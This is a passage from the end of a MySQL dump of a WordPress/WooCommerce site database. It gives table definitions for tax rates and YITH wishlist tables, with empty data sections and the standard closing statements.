  KEY `tax_rate_state` (`tax_rate_state`(2)),
  KEY `tax_rate_class` (`tax_rate_class`(10)),
  KEY `tax_rate_priority` (`tax_rate_priority`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_tax_rates`
--

LOCK TABLES `wpev_woocommerce_tax_rates` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_tax_rates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_tax_rates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_yith_wcwl`
--

DROP TABLE IF EXISTS `wpev_yith_wcwl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_yith_wcwl` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `prod_id` bigint(20) NOT NULL,
  `quantity` int(11) NOT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `wishlist_id` bigint(20) DEFAULT NULL,
  `position` int(11) DEFAULT 0,
  `original_price` decimal(9,3) DEFAULT NULL,
  `original_currency` char(3) DEFAULT NULL,
  `dateadded` timestamp NOT NULL DEFAULT current_timestamp(),
  `on_sale` tinyint(4) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `prod_id` (`prod_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_yith_wcwl`
--

LOCK TABLES `wpev_yith_wcwl` WRITE;
/*!40000 ALTER TABLE `wpev_yith_wcwl` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_yith_wcwl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_yith_wcwl_lists`
--

DROP TABLE IF EXISTS `wpev_yith_wcwl_lists`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_yith_wcwl_lists` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) DEFAULT NULL,
  `session_id` varchar(255) DEFAULT NULL,
  `wishlist_slug` varchar(200) NOT NULL,
  `wishlist_name` text DEFAULT NULL,
  `wishlist_token` varchar(64) NOT NULL,
  `wishlist_privacy` tinyint(1) NOT NULL DEFAULT 0,
  `is_default` tinyint(1) NOT NULL DEFAULT 0,
  `dateadded` timestamp NOT NULL DEFAULT current_timestamp(),
  `expiration` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `wishlist_token` (`wishlist_token`),
  KEY `wishlist_slug` (`wishlist_slug`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_yith_wcwl_lists`
--

LOCK TABLES `wpev_yith_wcwl_lists` WRITE;
/*!40000 ALTER TABLE `wpev_yith_wcwl_lists` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_yith_wcwl_lists` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-07-03  4:53:43
